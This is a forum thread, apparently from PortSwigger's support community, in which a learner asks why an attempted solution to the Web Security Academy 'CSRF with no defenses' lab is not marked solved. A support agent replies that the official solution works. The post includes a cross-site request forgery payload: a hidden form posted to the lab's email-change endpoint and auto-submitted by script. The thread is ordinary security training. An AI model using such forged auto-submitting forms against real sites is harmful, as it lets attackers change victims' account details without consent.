Name is required.
Email address is required.
Invalid email address
Answer is required.
Exceeding max length of 5KB

CSRF exercise

rob_stack_attack Aug 02, 2019 12:27AM UTC

I am trying to solve the CSRF exercise/tutorial. I'm new to burp/port swigger. Here is a link to the exercise: https://portswigger.net/web-security/csrf/lab-no-defenses

The solution I came up with is this:

<form method="$POST" action="https://acfd1fc01ec27f6f80b26b810015001d.web-security-academy.net/email"> <input type="hidden" name="$email" value="$badEmail@bad.com"> </form> <script> document.forms[0].submit(); </script>

After checking to see if it works I am brought back to the fake change email page and I can see the values changed/represented in the URL but the icon that says "unsolved" doesn't change to "solved". Does anyone know what I'm doing wrong?


Liam Tai-Hogan Aug 02, 2019 12:56PM UTC Support Center agent

Have you followed the steps in the solution?


rob_stack_attack Aug 02, 2019 03:51PM UTC
Yes I have. The steps can be seen in the solution but it's possible I misread something. Keep in mind I am using the community edition but there is nothing in the solution directly for that. The solution simply gives the template and says to fill in the info which I did.

Liam Tai-Hogan Aug 05, 2019 10:20AM UTC Support Center agent

We’ve tested the solution and it works for us.


Post Your public answer

Your name
Your email address
Answer